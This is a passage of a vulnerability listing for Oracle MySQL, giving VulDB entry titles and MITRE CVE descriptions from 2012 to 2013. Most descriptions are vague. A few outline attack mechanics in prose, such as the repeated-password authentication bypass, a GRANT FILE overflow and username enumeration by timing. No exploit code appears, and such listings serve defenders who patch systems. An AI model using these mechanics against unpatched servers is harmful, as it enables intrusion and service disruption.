10451| [125553] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
10452| [125552] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
10453| [125551] Oracle MySQL Server up to 5.7.23/8.0.12 Partition denial of service
10454| [125549] Oracle MySQL Server up to 5.7.23/8.0.12 Optimizer denial of service
10455| [125546] Oracle MySQL Server up to 5.7.23/8.0.12 InnoDB denial of service
10456| [125545] Oracle MySQL Server up to 5.7.23/8.0.12 Audit denial of service
10457| [125536] Oracle MySQL Server up to 5.7.23/8.0.12 Parser denial of service
10458| [138098] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Plug-in unknown vulnerability
10459| [138097] Oracle MySQL Server up to 5.7.26/8.0.16 Client programs denial of service
10460| [138094] Oracle MySQL Server up to 5.7.25/8.0.15 Replication denial of service
10461| [138085] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
10462| [138084] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
10463| [138073] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Log denial of service
10464| [138072] Oracle MySQL Server up to 5.7.26/8.0.16 Privileges unknown vulnerability
10465| [138069] Oracle MySQL Server up to 5.7.26/8.0.16 InnoDB unknown vulnerability
10466| [138058] Oracle MySQL Server up to 5.7.26/8.0.15 cURL unknown vulnerability
10467| [129647] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
10468| [129646] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
10469| [129644] Oracle MySQL Server up to 5.7.24/8.0.13 Partition denial of service
10470| [129640] Oracle MySQL Server up to 5.7.24/8.0.13 Optimizer denial of service
10471| [129635] Oracle MySQL Server up to 5.7.24/8.0.13 InnoDB denial of service
10472| [129628] Oracle MySQL Server up to 5.7.24/8.0.13 Parser denial of service
10473| [121797] Oracle MySQL Server up to 5.7.22/8.0.11 Privileges unknown vulnerability
10474| [121792] Oracle MySQL Server up to 5.7.22 DML denial of service
10475| [121789] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
10476| [121788] Oracle MySQL Server up to 5.7.22/8.0.11 DDL denial of service
10477| [121786] Oracle MySQL Server up to 5.7.22 Audit Log denial of service
10478| [121779] Oracle MySQL Server up to 5.7.22/8.0.11 DML denial of service
10479| [121778] Oracle MySQL Server up to 5.7.22/8.0.11 InnoDB denial of service
10480| [116759] Oracle MySQL Server up to 5.7.21 Group Replication GCS denial of service
10481| [116758] Oracle MySQL Server up to 5.7.21 Pluggable Auth denial of service
10482| [116757] Oracle MySQL Server up to 5.7.21 Performance Schema denial of service
10483| [116756] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
10484| [116754] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
10485| [116753] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
10486| [116752] Oracle MySQL Server up to 5.7.21 DML denial of service
10487| [116750] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
10488| [116749] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
10489| [116747] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
10490| [116745] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
10491| [116743] Oracle MySQL Server up to 5.7.21 InnoDB denial of service
10492| [116740] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
10493| [116739] Oracle MySQL Server up to 5.7.21 Optimizer denial of service
10494| [112110] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
10495| [112109] Oracle MySQL Server up to 5.7.20 Optimizer denial of service
10496| [112108] Oracle MySQL Server up to 5.7.20 InnoDB denial of service
10497| [112107] Oracle MySQL Server up to 5.7.20 DML denial of service
10498| [112106] Oracle MySQL Server up to 5.7.20 DML denial of service
10499| [112105] Oracle MySQL Server up to 5.7.20 DML denial of service
10500| [75159] Oracle MySQL up to 5.7.2 SSL Client weak encryption
10501|
10502| MITRE CVE - https://cve.mitre.org:
10503| [CVE-2013-3812] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
10504| [CVE-2013-3811] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3806.
10505| [CVE-2013-3810] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA Transactions.
10506| [CVE-2013-3809] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log.
10507| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
10508| [CVE-2013-3807] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Server Privileges.
10509| [CVE-2013-3806] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3811.
10510| [CVE-2013-3805] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements.
10511| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10512| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
10513| [CVE-2013-3801] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
10514| [CVE-2013-3798] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect integrity and availability via unknown vectors related to MemCached.
10515| [CVE-2013-3796] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10516| [CVE-2013-3795] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10517| [CVE-2013-3794] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
10518| [CVE-2013-3793] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10519| [CVE-2013-3783] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Parser.
10520| [CVE-2013-2395] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-1567.
10521| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10522| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
10523| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10524| [CVE-2013-2381] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server Privileges.
10525| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
10526| [CVE-2013-2376] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
10527| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
10528| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
10529| [CVE-2013-1570] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote attackers to affect availability via unknown vectors related to MemCached.
10530| [CVE-2013-1567] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-2395.
10531| [CVE-2013-1566] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10532| [CVE-2013-1555] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
10533| [CVE-2013-1552] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
10534| [CVE-2013-1548] Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
10535| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10536| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
10537| [CVE-2013-1531] Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
10538| [CVE-2013-1526] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
10539| [CVE-2013-1523] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Optimizer.
10540| [CVE-2013-1521] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
10541| [CVE-2013-1512] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10542| [CVE-2013-1511] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10543| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
10544| [CVE-2013-1502] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition.
10545| [CVE-2013-1492] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.30, has unspecified impact and attack vectors, a different vulnerability than CVE-2012-0553.
10546| [CVE-2013-0389] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10547| [CVE-2013-0386] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
10548| [CVE-2013-0385] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
10549| [CVE-2013-0384] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
10550| [CVE-2013-0383] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
10551| [CVE-2013-0375] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
10552| [CVE-2013-0371] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability, related to MyISAM.
10553| [CVE-2013-0368] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10554| [CVE-2013-0367] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
10555| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
10556| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
10557| [CVE-2012-5613] ** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
10558| [CVE-2012-5612] Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions through 5.5.28, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code, as demonstrated using certain variations of the (1) USE, (2) SHOW TABLES, (3) DESCRIBE, (4) SHOW FIELDS FROM, (5) SHOW COLUMNS FROM, (6) SHOW INDEX FROM, (7) CREATE TABLE, (8) DROP TABLE, (9) ALTER TABLE, (10) DELETE FROM, (11) UPDATE, and (12) SET PASSWORD commands.
10559| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
10560| [CVE-2012-5383] ** DISPUTED ** Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation.
10561| [CVE-2012-5096] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users with Server Privileges to affect availability via unknown vectors.
10562| [CVE-2012-5060] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.65 and earlier and 5.5.27 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
10563| [CVE-2012-4452] MySQL 5.0.88, and possibly other versions and platforms, allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of a CVE-2009-4030 regression, which was not omitted in other packages and versions such as MySQL 5.0.95 in Red Hat Enterprise Linux 6.
10564| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
10565| [CVE-2012-3197] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
10566| [CVE-2012-3180] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10567| [CVE-2012-3177] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
10568| [CVE-2012-3173] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
10569| [CVE-2012-3167] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
10570| [CVE-2012-3166] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10571| [CVE-2012-3163] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
10572| [CVE-2012-3160] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
10573| [CVE-2012-3158] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
10574| [CVE-2012-3156] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
10575| [CVE-2012-3150] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10576| [CVE-2012-3149] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect confidentiality, related to MySQL Client.
10577| [CVE-2012-3147] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote attackers to affect integrity and availability, related to MySQL Client.
10578| [CVE-2012-3144] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
10579| [CVE-2012-2750] Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown impact and attack vectors related to a "Security Fix", aka Bug #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of 20120816, Oracle has not commented on this possibility.
10580| [CVE-2012-2749] MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote authenticated users to cause a denial of service (mysqld crash) via vectors related to incorrect calculation and a sort order index.
10581| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
10582| [CVE-2012-2102] MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
10583| [CVE-2012-1757] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10584| [CVE-2012-1756] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors.
10585| [CVE-2012-1735] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10586| [CVE-2012-1734] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10587| [CVE-2012-1705] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10588| [CVE-2012-1703] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10589| [CVE-2012-1702] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
10590| [CVE-2012-1697] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
10591| [CVE-2012-1696] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.19 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10592| [CVE-2012-1690] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10593| [CVE-2012-1689] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10594| [CVE-2012-1688] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
10595| [CVE-2012-0882] Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other versions including 5.5.x before 5.5.22 and 5.1.x before 5.1.62, allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VulnDisco Pack Professional 9.17. NOTE: as of 20120224, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. NOTE: due to lack of details, it is not clear whether this issue is a duplicate of CVE-2012-0492 or another CVE.
10596| [CVE-2012-0583] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.60 and earlier, and 5.5.19 and earlier, allows remote authenticated users to affect availability, related to MyISAM.
10597| [CVE-2012-0578] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10598| [CVE-2012-0574] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
10599| [CVE-2012-0572] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10600| [CVE-2012-0553] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.28, has unspecified impact and attack vectors, a different vulnerability than CVE-2013-1492.
10601| [CVE-2012-0540] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
10602| [CVE-2012-0496] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
10603| [CVE-2012-0495] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0493.
10604| [CVE-2012-0494] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows local users to affect availability via unknown vectors.
10605| [CVE-2012-0493] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0495.
10606| [CVE-2012-0492] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
10607| [CVE-2012-0491] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0493, and CVE-2012-0495.
10608| [CVE-2012-0490] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
10609| [CVE-2012-0489] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10610| [CVE-2012-0488] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10611| [CVE-2012-0487] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10612| [CVE-2012-0486] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10613| [CVE-2012-0485] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
10614| [CVE-2012-0484] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
10615| [CVE-2012-0120] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
10616| [CVE-2012-0119] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
10617| [CVE-2012-0118] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
10618| [CVE-2012-0117] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
10619| [CVE-2012-0116] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
10620| [CVE-2012-0115] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
10621| [CVE-2012-0114] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
10622| [CVE-2012-0113] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
